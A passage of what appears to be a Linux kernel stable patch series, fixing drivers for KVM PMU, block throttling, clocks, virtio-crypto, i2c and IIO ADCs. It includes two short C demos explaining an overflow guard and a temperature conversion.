+@@ -149,7 +149,7 @@ static int amd_pmu_set_msr(struct kvm_vcpu *vcpu, struct msr_data *msr_info)
+ 	/* MSR_PERFCTRn */
+ 	pmc = get_gp_pmc_amd(pmu, msr, PMU_TYPE_COUNTER);
+ 	if (pmc) {
+-		pmc->counter += data - pmc_read_counter(pmc);
++		pmc_write_counter(pmc, data);
+ 		pmc_update_sample_period(pmc);
+ 		return 0;
+ 	}
+diff --git a/arch/x86/kvm/vmx/pmu_intel.c b/arch/x86/kvm/vmx/pmu_intel.c
+index 9fabfe71fd879..9a75a0d5deae1 100644
+--- a/arch/x86/kvm/vmx/pmu_intel.c
++++ b/arch/x86/kvm/vmx/pmu_intel.c
+@@ -461,11 +461,11 @@ static int intel_pmu_set_msr(struct kvm_vcpu *vcpu, struct msr_data *msr_info)
+ 			if (!msr_info->host_initiated &&
+ 			    !(msr & MSR_PMC_FULL_WIDTH_BIT))
+ 				data = (s64)(s32)data;
+-			pmc->counter += data - pmc_read_counter(pmc);
++			pmc_write_counter(pmc, data);
+ 			pmc_update_sample_period(pmc);
+ 			return 0;
+ 		} else if ((pmc = get_fixed_pmc(pmu, msr))) {
+-			pmc->counter += data - pmc_read_counter(pmc);
++			pmc_write_counter(pmc, data);
+ 			pmc_update_sample_period(pmc);
+ 			return 0;
+ 		} else if ((pmc = get_gp_pmc(pmu, msr, MSR_P6_EVNTSEL0))) {
+diff --git a/block/blk-throttle.c b/block/blk-throttle.c
+index 1007f80278579..009b0d76bf036 100644
+--- a/block/blk-throttle.c
++++ b/block/blk-throttle.c
+@@ -723,6 +723,12 @@ static unsigned int calculate_io_allowed(u32 iops_limit,
+ 
+ static u64 calculate_bytes_allowed(u64 bps_limit, unsigned long jiffy_elapsed)
+ {
++	/*
++	 * Can result be wider than 64 bits?
++	 * We check against 62, not 64, due to ilog2 truncation.
++	 */
++	if (ilog2(bps_limit) + ilog2(jiffy_elapsed) - ilog2(HZ) > 62)
++		return U64_MAX;
+ 	return mul_u64_u64_div_u64(bps_limit, (u64)jiffy_elapsed, (u64)HZ);
+ }
+ 
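
The new guard works because ilog2() truncates: ilog2(x) = floor(log2(x)), so each operand can hide almost one extra bit and the sum can understate the product's width by up to two bits. Checking the sum against 62 instead of 64 therefore guarantees the multiplication cannot wrap; the boundary case is shown below (HZ is taken as 1 to keep the demo self-contained):

    #include <stdio.h>
    #include <stdint.h>

    static int ilog2_u64(uint64_t v)    /* floor(log2(v)), v > 0 */
    {
        int l = -1;
        while (v) { v >>= 1; l++; }
        return l;
    }

    int main(void)
    {
        uint64_t a = (1ULL << 32) - 1;            /* ilog2 = 31 */
        int sum = ilog2_u64(a) + ilog2_u64(a);    /* 62: still allowed */

        /* a*a = 0xFFFFFFFE00000001 fits in 64 bits even though the true
         * log2 is ~63.99, so sums <= 62 are safe and only sums > 62 must
         * short-circuit to U64_MAX. */
        printf("sum=%d a*a=0x%llx\n", sum, (unsigned long long)(a * a));
        return 0;
    }
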
+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index 2b9676416b8e8..e614eb3355d39 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -1084,10 +1084,11 @@ int ata_scsi_dev_config(struct scsi_device *sdev, struct ata_device *dev)
+ 
+ 		/*
+ 		 * Ask the sd driver to issue START STOP UNIT on runtime suspend
+-		 * and resume only. For system level suspend/resume, devices
+-		 * power state is handled directly by libata EH.
++		 * and resume and shutdown only. For system level suspend/resume,
++		 * devices power state is handled directly by libata EH.
+ 		 */
+ 		sdev->manage_runtime_start_stop = true;
++		sdev->manage_shutdown = true;
+ 	}
+ 
+ 	/*
+diff --git a/drivers/clk/clk.c b/drivers/clk/clk.c
+index e0de6565800d2..33fedbd096f33 100644
+--- a/drivers/clk/clk.c
++++ b/drivers/clk/clk.c
+@@ -3340,6 +3340,7 @@ static void possible_parent_show(struct seq_file *s, struct clk_core *core,
+ 				 unsigned int i, char terminator)
+ {
+ 	struct clk_core *parent;
++	const char *name = NULL;
+ 
+ 	/*
+ 	 * Go through the following options to fetch a parent's name.
+@@ -3354,18 +3355,20 @@ static void possible_parent_show(struct seq_file *s, struct clk_core *core,
+ 	 * registered (yet).
+ 	 */
+ 	parent = clk_core_get_parent_by_index(core, i);
+-	if (parent)
++	if (parent) {
+ 		seq_puts(s, parent->name);
+-	else if (core->parents[i].name)
++	} else if (core->parents[i].name) {
+ 		seq_puts(s, core->parents[i].name);
+-	else if (core->parents[i].fw_name)
++	} else if (core->parents[i].fw_name) {
+ 		seq_printf(s, "<%s>(fw)", core->parents[i].fw_name);
+-	else if (core->parents[i].index >= 0)
+-		seq_puts(s,
+-			 of_clk_get_parent_name(core->of_node,
+-						core->parents[i].index));
+-	else
+-		seq_puts(s, "(missing)");
++	} else {
++		if (core->parents[i].index >= 0)
++			name = of_clk_get_parent_name(core->of_node, core->parents[i].index);
++		if (!name)
++			name = "(missing)";
++
++		seq_puts(s, name);
++	}
+ 
+ 	seq_putc(s, terminator);
+ }
+diff --git a/drivers/clk/ti/clk-44xx.c b/drivers/clk/ti/clk-44xx.c
+index 868bc7af21b0b..9b2824ed785b9 100644
+--- a/drivers/clk/ti/clk-44xx.c
++++ b/drivers/clk/ti/clk-44xx.c
+@@ -749,9 +749,14 @@ static struct ti_dt_clk omap44xx_clks[] = {
+ 	DT_CLK(NULL, "mcbsp1_sync_mux_ck", "abe-clkctrl:0028:26"),
+ 	DT_CLK(NULL, "mcbsp2_sync_mux_ck", "abe-clkctrl:0030:26"),
+ 	DT_CLK(NULL, "mcbsp3_sync_mux_ck", "abe-clkctrl:0038:26"),
++	DT_CLK("40122000.mcbsp", "prcm_fck", "abe-clkctrl:0028:26"),
++	DT_CLK("40124000.mcbsp", "prcm_fck", "abe-clkctrl:0030:26"),
++	DT_CLK("40126000.mcbsp", "prcm_fck", "abe-clkctrl:0038:26"),
+ 	DT_CLK(NULL, "mcbsp4_sync_mux_ck", "l4-per-clkctrl:00c0:26"),
++	DT_CLK("48096000.mcbsp", "prcm_fck", "l4-per-clkctrl:00c0:26"),
+ 	DT_CLK(NULL, "ocp2scp_usb_phy_phy_48m", "l3-init-clkctrl:00c0:8"),
+ 	DT_CLK(NULL, "otg_60m_gfclk", "l3-init-clkctrl:0040:24"),
++	DT_CLK(NULL, "pad_fck", "pad_clks_ck"),
+ 	DT_CLK(NULL, "per_mcbsp4_gfclk", "l4-per-clkctrl:00c0:24"),
+ 	DT_CLK(NULL, "pmd_stm_clock_mux_ck", "emu-sys-clkctrl:0000:20"),
+ 	DT_CLK(NULL, "pmd_trace_clk_mux_ck", "emu-sys-clkctrl:0000:22"),
+diff --git a/drivers/clk/ti/clk-54xx.c b/drivers/clk/ti/clk-54xx.c
+index b4aff76eb3735..74dfd5823f835 100644
+--- a/drivers/clk/ti/clk-54xx.c
++++ b/drivers/clk/ti/clk-54xx.c
+@@ -565,15 +565,19 @@ static struct ti_dt_clk omap54xx_clks[] = {
+ 	DT_CLK(NULL, "gpio8_dbclk", "l4per-clkctrl:00f8:8"),
+ 	DT_CLK(NULL, "mcbsp1_gfclk", "abe-clkctrl:0028:24"),
+ 	DT_CLK(NULL, "mcbsp1_sync_mux_ck", "abe-clkctrl:0028:26"),
++	DT_CLK("40122000.mcbsp", "prcm_fck", "abe-clkctrl:0028:26"),
+ 	DT_CLK(NULL, "mcbsp2_gfclk", "abe-clkctrl:0030:24"),
+ 	DT_CLK(NULL, "mcbsp2_sync_mux_ck", "abe-clkctrl:0030:26"),
++	DT_CLK("40124000.mcbsp", "prcm_fck", "abe-clkctrl:0030:26"),
+ 	DT_CLK(NULL, "mcbsp3_gfclk", "abe-clkctrl:0038:24"),
+ 	DT_CLK(NULL, "mcbsp3_sync_mux_ck", "abe-clkctrl:0038:26"),
++	DT_CLK("40126000.mcbsp", "prcm_fck", "abe-clkctrl:0038:26"),
+ 	DT_CLK(NULL, "mmc1_32khz_clk", "l3init-clkctrl:0008:8"),
+ 	DT_CLK(NULL, "mmc1_fclk", "l3init-clkctrl:0008:25"),
+ 	DT_CLK(NULL, "mmc1_fclk_mux", "l3init-clkctrl:0008:24"),
+ 	DT_CLK(NULL, "mmc2_fclk", "l3init-clkctrl:0010:25"),
+ 	DT_CLK(NULL, "mmc2_fclk_mux", "l3init-clkctrl:0010:24"),
++	DT_CLK(NULL, "pad_fck", "pad_clks_ck"),
+ 	DT_CLK(NULL, "sata_ref_clk", "l3init-clkctrl:0068:8"),
+ 	DT_CLK(NULL, "timer10_gfclk_mux", "l4per-clkctrl:0008:24"),
+ 	DT_CLK(NULL, "timer11_gfclk_mux", "l4per-clkctrl:0010:24"),
+diff --git a/drivers/crypto/virtio/virtio_crypto_common.h b/drivers/crypto/virtio/virtio_crypto_common.h
+index 59a4c02594563..154590e1f7643 100644
+--- a/drivers/crypto/virtio/virtio_crypto_common.h
++++ b/drivers/crypto/virtio/virtio_crypto_common.h
+@@ -35,6 +35,9 @@ struct virtio_crypto {
+ 	struct virtqueue *ctrl_vq;
+ 	struct data_queue *data_vq;
+ 
++	/* Work struct for config space updates */
++	struct work_struct config_work;
++
+ 	/* To protect the vq operations for the controlq */
+ 	spinlock_t ctrl_lock;
+ 
+diff --git a/drivers/crypto/virtio/virtio_crypto_core.c b/drivers/crypto/virtio/virtio_crypto_core.c
+index 1198bd3063655..3842915ea7437 100644
+--- a/drivers/crypto/virtio/virtio_crypto_core.c
++++ b/drivers/crypto/virtio/virtio_crypto_core.c
+@@ -335,6 +335,14 @@ static void virtcrypto_del_vqs(struct virtio_crypto *vcrypto)
+ 	virtcrypto_free_queues(vcrypto);
+ }
+ 
++static void vcrypto_config_changed_work(struct work_struct *work)
++{
++	struct virtio_crypto *vcrypto =
++		container_of(work, struct virtio_crypto, config_work);
++
++	virtcrypto_update_status(vcrypto);
++}
++
+ static int virtcrypto_probe(struct virtio_device *vdev)
+ {
+ 	int err = -EFAULT;
+@@ -454,6 +462,8 @@ static int virtcrypto_probe(struct virtio_device *vdev)
+ 	if (err)
+ 		goto free_engines;
+ 
++	INIT_WORK(&vcrypto->config_work, vcrypto_config_changed_work);
++
+ 	return 0;
+ 
+ free_engines:
+@@ -489,6 +499,7 @@ static void virtcrypto_remove(struct virtio_device *vdev)
+ 
+ 	dev_info(&vdev->dev, "Start virtcrypto_remove.\n");
+ 
++	flush_work(&vcrypto->config_work);
+ 	if (virtcrypto_dev_started(vcrypto))
+ 		virtcrypto_dev_stop(vcrypto);
+ 	virtio_reset_device(vdev);
+@@ -503,7 +514,7 @@ static void virtcrypto_config_changed(struct virtio_device *vdev)
+ {
+ 	struct virtio_crypto *vcrypto = vdev->priv;
+ 
+-	virtcrypto_update_status(vcrypto);
++	schedule_work(&vcrypto->config_work);
+ }
+ 
+ #ifdef CONFIG_PM_SLEEP
+@@ -511,6 +522,7 @@ static int virtcrypto_freeze(struct virtio_device *vdev)
+ {
+ 	struct virtio_crypto *vcrypto = vdev->priv;
+ 
++	flush_work(&vcrypto->config_work);
+ 	virtio_reset_device(vdev);
+ 	virtcrypto_free_unused_reqs(vcrypto);
+ 	if (virtcrypto_dev_started(vcrypto))
+diff --git a/drivers/firewire/sbp2.c b/drivers/firewire/sbp2.c
+index e322a326546b5..7ad2e03afd4e5 100644
+--- a/drivers/firewire/sbp2.c
++++ b/drivers/firewire/sbp2.c
+@@ -1521,6 +1521,7 @@ static int sbp2_scsi_slave_configure(struct scsi_device *sdev)
+ 	if (sbp2_param_exclusive_login) {
+ 		sdev->manage_system_start_stop = true;
+ 		sdev->manage_runtime_start_stop = true;
++		sdev->manage_shutdown = true;
+ 	}
+ 
+ 	if (sdev->type == TYPE_ROM)
+diff --git a/drivers/firmware/imx/imx-dsp.c b/drivers/firmware/imx/imx-dsp.c
+index 1f410809d3ee4..0f656e4191d5c 100644
+--- a/drivers/firmware/imx/imx-dsp.c
++++ b/drivers/firmware/imx/imx-dsp.c
+@@ -115,11 +115,11 @@ static int imx_dsp_setup_channels(struct imx_dsp_ipc *dsp_ipc)
+ 		dsp_chan->idx = i % 2;
+ 		dsp_chan->ch = mbox_request_channel_byname(cl, chan_name);
+ 		if (IS_ERR(dsp_chan->ch)) {
+-			kfree(dsp_chan->name);
+ 			ret = PTR_ERR(dsp_chan->ch);
+ 			if (ret != -EPROBE_DEFER)
+ 				dev_err(dev, "Failed to request mbox chan %s ret %d\n",
+ 					chan_name, ret);
++			kfree(dsp_chan->name);
+ 			goto out;
+ 		}
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/vi.c b/drivers/gpu/drm/amd/amdgpu/vi.c
+index 53a3bb7fc9c47..1bfd7b49fe9c3 100644
+--- a/drivers/gpu/drm/amd/amdgpu/vi.c
++++ b/drivers/gpu/drm/amd/amdgpu/vi.c
+@@ -1147,7 +1147,7 @@ static void vi_program_aspm(struct amdgpu_device *adev)
+ 	bool bL1SS = false;
+ 	bool bClkReqSupport = true;
+ 
+-	if (!amdgpu_device_should_use_aspm(adev) || !amdgpu_device_aspm_support_quirk())
++	if (!amdgpu_device_should_use_aspm(adev) || !amdgpu_device_pcie_dynamic_switching_supported())
+ 		return;
+ 
+ 	if (adev->flags & AMD_IS_APU ||
+diff --git a/drivers/gpu/drm/display/drm_dp_mst_topology.c b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+index f854cb5eafbe7..72b2b171e533e 100644
+--- a/drivers/gpu/drm/display/drm_dp_mst_topology.c
++++ b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+@@ -2574,14 +2574,14 @@ static struct drm_dp_mst_branch *get_mst_branch_device_by_guid_helper(
+ 	struct drm_dp_mst_branch *found_mstb;
+ 	struct drm_dp_mst_port *port;
+ 
++	if (!mstb)
++		return NULL;
++
+ 	if (memcmp(mstb->guid, guid, 16) == 0)
+ 		return mstb;
+ 
+ 
+ 	list_for_each_entry(port, &mstb->ports, next) {
+-		if (!port->mstb)
+-			continue;
+-
+ 		found_mstb = get_mst_branch_device_by_guid_helper(port->mstb, guid);
+ 
+ 		if (found_mstb)
+diff --git a/drivers/gpu/drm/i915/i915_pmu.c b/drivers/gpu/drm/i915/i915_pmu.c
+index 958b37123bf12..89eec585880f0 100644
+--- a/drivers/gpu/drm/i915/i915_pmu.c
++++ b/drivers/gpu/drm/i915/i915_pmu.c
+@@ -760,9 +760,18 @@ static void i915_pmu_event_start(struct perf_event *event, int flags)
+ 
+ static void i915_pmu_event_stop(struct perf_event *event, int flags)
+ {
++	struct drm_i915_private *i915 =
++		container_of(event->pmu, typeof(*i915), pmu.base);
++	struct i915_pmu *pmu = &i915->pmu;
++
++	if (pmu->closed)
++		goto out;
++
+ 	if (flags & PERF_EF_UPDATE)
+ 		i915_pmu_event_read(event);
+ 	i915_pmu_disable(event);
++
++out:
+ 	event->hw.state = PERF_HES_STOPPED;
+ }
+ 
+diff --git a/drivers/gpu/drm/logicvc/Kconfig b/drivers/gpu/drm/logicvc/Kconfig
+index fa7a883688094..1df22a852a23e 100644
+--- a/drivers/gpu/drm/logicvc/Kconfig
++++ b/drivers/gpu/drm/logicvc/Kconfig
+@@ -5,5 +5,7 @@ config DRM_LOGICVC
+ 	select DRM_KMS_HELPER
+ 	select DRM_KMS_DMA_HELPER
+ 	select DRM_GEM_DMA_HELPER
++	select REGMAP
++	select REGMAP_MMIO
+ 	help
+ 	  DRM display driver for the logiCVC programmable logic block from Xylon
+diff --git a/drivers/i2c/busses/i2c-aspeed.c b/drivers/i2c/busses/i2c-aspeed.c
+index 866c52afb8b0a..6adf3b141316b 100644
+--- a/drivers/i2c/busses/i2c-aspeed.c
++++ b/drivers/i2c/busses/i2c-aspeed.c
+@@ -749,6 +749,8 @@ static void __aspeed_i2c_reg_slave(struct aspeed_i2c_bus *bus, u16 slave_addr)
+ 	func_ctrl_reg_val = readl(bus->base + ASPEED_I2C_FUN_CTRL_REG);
+ 	func_ctrl_reg_val |= ASPEED_I2CD_SLAVE_EN;
+ 	writel(func_ctrl_reg_val, bus->base + ASPEED_I2C_FUN_CTRL_REG);
++
++	bus->slave_state = ASPEED_I2C_SLAVE_INACTIVE;
+ }
+ 
+ static int aspeed_i2c_reg_slave(struct i2c_client *client)
+@@ -765,7 +767,6 @@ static int aspeed_i2c_reg_slave(struct i2c_client *client)
+ 	__aspeed_i2c_reg_slave(bus, client->addr);
+ 
+ 	bus->slave = client;
+-	bus->slave_state = ASPEED_I2C_SLAVE_INACTIVE;
+ 	spin_unlock_irqrestore(&bus->lock, flags);
+ 
+ 	return 0;
+diff --git a/drivers/i2c/busses/i2c-stm32f7.c b/drivers/i2c/busses/i2c-stm32f7.c
+index d1c59d83a65b9..cb995449ebf3d 100644
+--- a/drivers/i2c/busses/i2c-stm32f7.c
++++ b/drivers/i2c/busses/i2c-stm32f7.c
+@@ -1059,9 +1059,10 @@ static int stm32f7_i2c_smbus_xfer_msg(struct stm32f7_i2c_dev *i2c_dev,
+ 	/* Configure PEC */
+ 	if ((flags & I2C_CLIENT_PEC) && f7_msg->size != I2C_SMBUS_QUICK) {
+ 		cr1 |= STM32F7_I2C_CR1_PECEN;
+-		cr2 |= STM32F7_I2C_CR2_PECBYTE;
+-		if (!f7_msg->read_write)
++		if (!f7_msg->read_write) {
++			cr2 |= STM32F7_I2C_CR2_PECBYTE;
+ 			f7_msg->count++;
++		}
+ 	} else {
+ 		cr1 &= ~STM32F7_I2C_CR1_PECEN;
+ 		cr2 &= ~STM32F7_I2C_CR2_PECBYTE;
+@@ -1149,8 +1150,10 @@ static void stm32f7_i2c_smbus_rep_start(struct stm32f7_i2c_dev *i2c_dev)
+ 	f7_msg->stop = true;
+ 
+ 	/* Add one byte for PEC if needed */
+-	if (cr1 & STM32F7_I2C_CR1_PECEN)
++	if (cr1 & STM32F7_I2C_CR1_PECEN) {
++		cr2 |= STM32F7_I2C_CR2_PECBYTE;
+ 		f7_msg->count++;
++	}
+ 
+ 	/* Set number of bytes to be transferred */
+ 	cr2 &= ~(STM32F7_I2C_CR2_NBYTES_MASK);
+diff --git a/drivers/i2c/muxes/i2c-demux-pinctrl.c b/drivers/i2c/muxes/i2c-demux-pinctrl.c
+index 8e8688e8de0fb..45a3f7e7b3f68 100644
+--- a/drivers/i2c/muxes/i2c-demux-pinctrl.c
++++ b/drivers/i2c/muxes/i2c-demux-pinctrl.c
+@@ -61,7 +61,7 @@ static int i2c_demux_activate_master(struct i2c_demux_pinctrl_priv *priv, u32 ne
+ 	if (ret)
+ 		goto err;
+ 
+-	adap = of_find_i2c_adapter_by_node(priv->chan[new_chan].parent_np);
++	adap = of_get_i2c_adapter_by_node(priv->chan[new_chan].parent_np);
+ 	if (!adap) {
+ 		ret = -ENODEV;
+ 		goto err_with_revert;
+diff --git a/drivers/i2c/muxes/i2c-mux-gpmux.c b/drivers/i2c/muxes/i2c-mux-gpmux.c
+index 33024acaac02b..0ebc12575081c 100644
+--- a/drivers/i2c/muxes/i2c-mux-gpmux.c
++++ b/drivers/i2c/muxes/i2c-mux-gpmux.c
+@@ -52,7 +52,7 @@ static struct i2c_adapter *mux_parent_adapter(struct device *dev)
+ 		dev_err(dev, "Cannot parse i2c-parent\n");
+ 		return ERR_PTR(-ENODEV);
+ 	}
+-	parent = of_find_i2c_adapter_by_node(parent_np);
++	parent = of_get_i2c_adapter_by_node(parent_np);
+ 	of_node_put(parent_np);
+ 	if (!parent)
+ 		return ERR_PTR(-EPROBE_DEFER);
+diff --git a/drivers/i2c/muxes/i2c-mux-pinctrl.c b/drivers/i2c/muxes/i2c-mux-pinctrl.c
+index d5ad904756fdf..f0bc4f3994817 100644
+--- a/drivers/i2c/muxes/i2c-mux-pinctrl.c
++++ b/drivers/i2c/muxes/i2c-mux-pinctrl.c
+@@ -62,7 +62,7 @@ static struct i2c_adapter *i2c_mux_pinctrl_parent_adapter(struct device *dev)
+ 		dev_err(dev, "Cannot parse i2c-parent\n");
+ 		return ERR_PTR(-ENODEV);
+ 	}
+-	parent = of_find_i2c_adapter_by_node(parent_np);
++	parent = of_get_i2c_adapter_by_node(parent_np);
+ 	of_node_put(parent_np);
+ 	if (!parent)
+ 		return ERR_PTR(-EPROBE_DEFER);
+diff --git a/drivers/iio/adc/exynos_adc.c b/drivers/iio/adc/exynos_adc.c
+index cff1ba57fb16a..43c8af41b4a9d 100644
+--- a/drivers/iio/adc/exynos_adc.c
++++ b/drivers/iio/adc/exynos_adc.c
+@@ -826,16 +826,26 @@ static int exynos_adc_probe(struct platform_device *pdev)
+ 		}
+ 	}
+ 
++	/* leave out any TS related code if unreachable */
++	if (IS_REACHABLE(CONFIG_INPUT)) {
++		has_ts = of_property_read_bool(pdev->dev.of_node,
++					       "has-touchscreen") || pdata;
++	}
++
+ 	irq = platform_get_irq(pdev, 0);
+ 	if (irq < 0)
+ 		return irq;
+ 	info->irq = irq;
+ 
+-	irq = platform_get_irq(pdev, 1);
+-	if (irq == -EPROBE_DEFER)
+-		return irq;
++	if (has_ts) {
++		irq = platform_get_irq(pdev, 1);
++		if (irq == -EPROBE_DEFER)
++			return irq;
+ 
+-	info->tsirq = irq;
++		info->tsirq = irq;
++	} else {
++		info->tsirq = -1;
++	}
+ 
+ 	info->dev = &pdev->dev;
+ 
+@@ -900,12 +910,6 @@ static int exynos_adc_probe(struct platform_device *pdev)
+ 	if (info->data->init_hw)
+ 		info->data->init_hw(info);
+ 
+-	/* leave out any TS related code if unreachable */
+-	if (IS_REACHABLE(CONFIG_INPUT)) {
+-		has_ts = of_property_read_bool(pdev->dev.of_node,
+-					       "has-touchscreen") || pdata;
+-	}
+-
+ 	if (pdata)
+ 		info->delay = pdata->delay;
+ 	else
+diff --git a/drivers/iio/adc/xilinx-xadc-core.c b/drivers/iio/adc/xilinx-xadc-core.c
+index 292f2892d223a..abb8891b9e82d 100644
+--- a/drivers/iio/adc/xilinx-xadc-core.c
++++ b/drivers/iio/adc/xilinx-xadc-core.c
+@@ -456,6 +456,9 @@ static const struct xadc_ops xadc_zynq_ops = {
+ 	.interrupt_handler = xadc_zynq_interrupt_handler,
+ 	.update_alarm = xadc_zynq_update_alarm,
+ 	.type = XADC_TYPE_S7,
++	/* Temp in C = (val * 503.975) / 2**bits - 273.15 */
++	.temp_scale = 503975,
++	.temp_offset = 273150,
+ };
+ 
+ static const unsigned int xadc_axi_reg_offsets[] = {
+@@ -566,6 +569,9 @@ static const struct xadc_ops xadc_7s_axi_ops = {
+ 	.interrupt_handler = xadc_axi_interrupt_handler,
+ 	.flags = XADC_FLAGS_BUFFERED | XADC_FLAGS_IRQ_OPTIONAL,
+ 	.type = XADC_TYPE_S7,
++	/* Temp in C = (val * 503.975) / 2**bits - 273.15 */
++	.temp_scale = 503975,
++	.temp_offset = 273150,
+ };
+ 
+ static const struct xadc_ops xadc_us_axi_ops = {
+@@ -577,6 +583,12 @@ static const struct xadc_ops xadc_us_axi_ops = {
+ 	.interrupt_handler = xadc_axi_interrupt_handler,
+ 	.flags = XADC_FLAGS_BUFFERED | XADC_FLAGS_IRQ_OPTIONAL,
+ 	.type = XADC_TYPE_US,
++	/**
++	 * Values below are for UltraScale+ (SYSMONE4) using internal reference.
++	 * See https://docs.xilinx.com/v/u/en-US/ug580-ultrascale-sysmon
++	 */
++	.temp_scale = 509314,
++	.temp_offset = 280231,
+ };
+ 
+ static int _xadc_update_adc_reg(struct xadc *xadc, unsigned int reg,
+@@ -948,8 +960,7 @@ static int xadc_read_raw(struct iio_dev *indio_dev,
+ 			*val2 = bits;
+ 			return IIO_VAL_FRACTIONAL_LOG2;
+ 		case IIO_TEMP:
+-			/* Temp in C = (val * 503.975) / 2**bits - 273.15 */
+-			*val = 503975;
++			*val = xadc->ops->temp_scale;
+ 			*val2 = bits;
+ 			return IIO_VAL_FRACTIONAL_LOG2;
+ 		default:
+@@ -957,7 +968,7 @@ static int xadc_read_raw(struct iio_dev *indio_dev,
+ 		}
+ 	case IIO_CHAN_INFO_OFFSET:
+ 		/* Only the temperature channel has an offset */
+-		*val = -((273150 << bits) / 503975);
++		*val = -((xadc->ops->temp_offset << bits) / xadc->ops->temp_scale);
+ 		return IIO_VAL_INT;
+ 	case IIO_CHAN_INFO_SAMP_FREQ:
+ 		ret = xadc_read_samplerate(xadc);
+@@ -1426,28 +1437,6 @@ static int xadc_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		return ret;
+ 
+-	/* Disable all alarms */
+-	ret = xadc_update_adc_reg(xadc, XADC_REG_CONF1, XADC_CONF1_ALARM_MASK,
+-				  XADC_CONF1_ALARM_MASK);
+-	if (ret)
+-		return ret;
+-
+-	/* Set thresholds to min/max */
+-	for (i = 0; i < 16; i++) {
+-		/*
+-		 * Set max voltage threshold and both temperature thresholds to
+-		 * 0xffff, min voltage threshold to 0.
+-		 */
+-		if (i % 8 < 4 || i == 7)
+-			xadc->threshold[i] = 0xffff;
+-		else
+-			xadc->threshold[i] = 0;
+-		ret = xadc_write_adc_reg(xadc, XADC_REG_THRESHOLD(i),
+-			xadc->threshold[i]);
+-		if (ret)
+-			return ret;
+-	}
+-
+ 	/* Go to non-buffered mode */
+ 	xadc_postdisable(indio_dev);
+ 
+diff --git a/drivers/iio/adc/xilinx-xadc.h b/drivers/iio/adc/xilinx-xadc.h
+index 7d78ce6989671..3036f4d613ff5 100644
+--- a/drivers/iio/adc/xilinx-xadc.h
++++ b/drivers/iio/adc/xilinx-xadc.h
+@@ -85,6 +85,8 @@ struct xadc_ops {
+ 
+ 	unsigned int flags;
+ 	enum xadc_type type;
++	int temp_scale;
++	int temp_offset;
+ };
+ 
+ static inline int _xadc_read_adc_reg(struct xadc *xadc, unsigned int reg,
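
For reference, the conversion encoded by .temp_scale/.temp_offset above follows
Temp in C = (raw * scale) / 2^bits - offset, with scale and offset in
millidegrees. A minimal stand-alone sketch (the raw sample value is
hypothetical):

	#include <stdio.h>

	int main(void)
	{
		unsigned int raw = 2528;	/* hypothetical 12-bit sample */
		unsigned int bits = 12;
		long scale = 503975;		/* 7-series: 503.975 milli-units */
		long offset = 273150;		/* 273.15 C in millidegrees */
		long temp_mc = (long)raw * scale / (1L << bits) - offset;

		printf("temperature: %ld.%03ld C\n",
		       temp_mc / 1000, temp_mc % 1000);
		return 0;
	}
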
+diff --git a/drivers/iio/afe/iio-rescale.c b/drivers/iio/afe/iio-rescale.c
+index 1f280c360701b..56e5913ab82d1 100644
+--- a/drivers/iio/afe/iio-rescale.c
++++ b/drivers/iio/afe/iio-rescale.c
+@@ -214,8 +214,18 @@ static int rescale_read_raw(struct iio_dev *indio_dev,
+ 				return ret < 0 ? ret : -EOPNOTSUPP;
+ 		}
+ 
+-		ret = iio_read_channel_scale(rescale->source, &scale, &scale2);
+-		return rescale_process_offset(rescale, ret, scale, scale2,
++		if (iio_channel_has_info(rescale->source->channel,
++					 IIO_CHAN_INFO_SCALE)) {
++			ret = iio_read_channel_scale(rescale->source, &scale, &scale2);
++			return rescale_process_offset(rescale, ret, scale, scale2,
++						      schan_off, val, val2);
++		}
++
++		/*
++		 * If we get here the source channel has no scale, so scale
++		 * 1:1 but still apply the rescaler and offset, if any.
++		 */
++		return rescale_process_offset(rescale, IIO_VAL_FRACTIONAL, 1, 1,
+ 					      schan_off, val, val2);
+ 	default:
+ 		return -EINVAL;
+@@ -280,8 +290,9 @@ static int rescale_configure_channel(struct device *dev,
+ 	chan->type = rescale->cfg->type;
+ 
+ 	if (iio_channel_has_info(schan, IIO_CHAN_INFO_RAW) &&
+-	    iio_channel_has_info(schan, IIO_CHAN_INFO_SCALE)) {
+-		dev_info(dev, "using raw+scale source channel\n");
++	    (iio_channel_has_info(schan, IIO_CHAN_INFO_SCALE) ||
++	     iio_channel_has_info(schan, IIO_CHAN_INFO_OFFSET))) {
++		dev_info(dev, "using raw+scale/offset source channel\n");
+ 	} else if (iio_channel_has_info(schan, IIO_CHAN_INFO_PROCESSED)) {
+ 		dev_info(dev, "using processed channel\n");
+ 		rescale->chan_processed = true;
+diff --git a/drivers/mcb/mcb-lpc.c b/drivers/mcb/mcb-lpc.c
+index 53decd89876ee..a851e02364642 100644
+--- a/drivers/mcb/mcb-lpc.c
++++ b/drivers/mcb/mcb-lpc.c
+@@ -23,7 +23,7 @@ static int mcb_lpc_probe(struct platform_device *pdev)
+ {
+ 	struct resource *res;
+ 	struct priv *priv;
+-	int ret = 0;
++	int ret = 0, table_size;
+ 
+ 	priv = devm_kzalloc(&pdev->dev, sizeof(*priv), GFP_KERNEL);
+ 	if (!priv)
+@@ -58,16 +58,43 @@ static int mcb_lpc_probe(struct platform_device *pdev)
+ 
+ 	ret = chameleon_parse_cells(priv->bus, priv->mem->start, priv->base);
+ 	if (ret < 0) {
+-		mcb_release_bus(priv->bus);
+-		return ret;
++		goto out_mcb_bus;
+ 	}
+ 
+-	dev_dbg(&pdev->dev, "Found %d cells\n", ret);
++	table_size = ret;
++
++	if (table_size < CHAM_HEADER_SIZE) {
++		/* Release the previous resources */
++		devm_iounmap(&pdev->dev, priv->base);
++		devm_release_mem_region(&pdev->dev, priv->mem->start, resource_size(priv->mem));
++
++		/* Then, allocate it again with the actual chameleon table size */
++		res = devm_request_mem_region(&pdev->dev, priv->mem->start,
++					      table_size,
++					      KBUILD_MODNAME);
++		if (!res) {
++			dev_err(&pdev->dev, "Failed to request PCI memory\n");
++			ret = -EBUSY;
++			goto out_mcb_bus;
++		}
++
++		priv->base = devm_ioremap(&pdev->dev, priv->mem->start, table_size);
++		if (!priv->base) {
++			dev_err(&pdev->dev, "Cannot ioremap\n");
++			ret = -ENOMEM;
++			goto out_mcb_bus;
++		}
++
++		platform_set_drvdata(pdev, priv);
++	}
+ 
+ 	mcb_bus_add_devices(priv->bus);
+ 
+ 	return 0;
+ 
++out_mcb_bus:
